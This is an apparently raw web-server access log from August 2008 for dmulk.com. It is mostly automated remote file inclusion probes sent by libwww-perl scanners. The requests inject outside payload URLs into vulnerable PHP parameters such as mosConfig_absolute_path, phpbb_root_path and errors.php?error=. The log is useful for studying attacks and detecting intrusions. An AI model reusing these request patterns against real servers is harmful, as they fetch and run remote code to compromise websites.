217.198.149.178 - - [12/Aug/2008:10:24:17 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:24:22 -0700] "GET /logs/access_080219.log/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:24:22 -0700] "GET /errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:24:23 -0700] "GET /logs/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:10:24:28 -0700] "GET /errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:10:24:28 -0700] "GET /logs/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:10:24:28 -0700] "GET /logs/access_080219.log/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:28 -0700] "GET /logs/access_080329.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:28 -0700] "GET /logs/access_080329.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:10:24:29 -0700] "GET /logs/access.log/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:24:29 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:24:29 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:24:31 -0700] "GET /logs/access_080224.log/errors.php?error=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:24:32 -0700] "GET /errors.php?error=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:24:32 -0700] "GET /logs/errors.php?error=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:32 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 18483 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:32 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 18499 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:32 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 60283 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:33 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 60283 "-" "libwww-perl/5.805" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:24:37 -0700] "GET /logs/access_080329.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:47 -0700] "GET /logs/access_080329.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:24:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:24:49 -0700] "GET /logs/access.log/errors.php?error=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:49 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 18499 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:50 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 60283 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:51 -0700] "GET /logs/access_080329.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:53 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 18483 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:24:53 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 60283 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:24:58 -0700] "GET /logs/access_080211.log//agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:25:00 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:25:00 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:25:02 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:25:07 -0700] "GET /logs/access_080309.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:25:29 -0700] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/idcaca.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:25:29 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/idcaca.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:25:37 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:25:37 -0700] "GET /logs/access_080309.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:25:37 -0700] "GET /logs/access_080309.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:25:38 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.189.205 - - [12/Aug/2008:10:25:46 -0700] "GET /logs/access_080309.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:25:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:25:47 -0700] "GET /logs/access_080302.log//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.17.183 - - [12/Aug/2008:10:26:10 -0700] "GET /logs/access_080107.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:26:42 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:26:44 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:26:45 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:26:48 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:27:02 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:27:02 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:27:03 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:27:03 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:27:09 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:27:10 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:27:11 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:27:11 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:27:12 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:27:12 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:27:14 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:27:31 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:27:32 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:27:34 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:27:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:27:52 -0700] "GET /logs//?pg=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 60288 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:27:54 -0700] "GET //?pg=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18385 "-" "libwww-perl/5.811" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:27:57 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:28:06 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:28:17 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:28:17 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:28:27 -0700] "GET /logs/access_080211.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:28:27 -0700] "GET /logs/access_080211.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:28:27 -0700] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:28:27 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:28:28 -0700] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:28:28 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:28:29 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:28:31 -0700] "GET //index.php?pagina=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:28:31 -0700] "GET /logs//index.php?pagina=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
79.101.1.9 - - [12/Aug/2008:10:28:38 -0700] "GET /logs/includes/orderSuccess.inc.php?glob=21&cart_order_id=21&glob[rootDir]=http://www.andrewbostom.org/components/com_galerry1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
79.101.1.9 - - [12/Aug/2008:10:28:38 -0700] "GET /includes/orderSuccess.inc.php?glob=21&cart_order_id=21&glob[rootDir]=http://www.andrewbostom.org/components/com_galerry1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:28:41 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:28:43 -0700] "GET //index.php?pagina=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.811" "www.dmulk.com"
80.231.0.98 - - [12/Aug/2008:10:28:44 -0700] "GET /logs/access_080330.log//main.php?appserv_root=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.0.98 - - [12/Aug/2008:10:28:44 -0700] "GET /logs//main.php?appserv_root=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.0.98 - - [12/Aug/2008:10:28:44 -0700] "GET //main.php?appserv_root=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:28:44 -0700] "GET /logs//index.php?pagina=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:28:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:28:51 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:28:56 -0700] "GET /logs/access_080312.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:28:56 -0700] "GET /logs/access_080312.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
65.55.211.26 - - [12/Aug/2008:10:29:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.26 - - [12/Aug/2008:10:29:08 -0700] "GET /logs/access_080623.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
89.97.229.104 - - [12/Aug/2008:10:29:24 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.weblogic.co.bw/echo? HTTP/1.1" 200 18467 "-" "libwww-perl/5.805" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:29:45 -0700] "GET /logs/access_080302.log//index.php?pagina=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:29:47 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:30:06 -0700] "GET /logs/access_080219.log//agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:30:13 -0700] "GET /logs/access_080302.log//index.php?pagina=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.70.187 - - [12/Aug/2008:10:30:14 -0700] "GET /logs/access_080324.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.70.187 - - [12/Aug/2008:10:30:14 -0700] "GET //components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.70.187 - - [12/Aug/2008:10:30:14 -0700] "GET /logs//components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.70.187 - - [12/Aug/2008:10:30:15 -0700] "GET /logs/access_080321.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:30:19 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:30:20 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:30:22 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:30:25 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:30:25 -0700] "GET /phphtml.php?htmlclass_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:30:25 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:30:39 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:30:40 -0700] "GET /logs/access_080325.log/errors.php?error=http://primeraconchali.cl/modules/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:30:40 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:30:44 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 60283 "-" "libwww-perl/5.79" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:10:30:46 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 18483 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:30:47 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
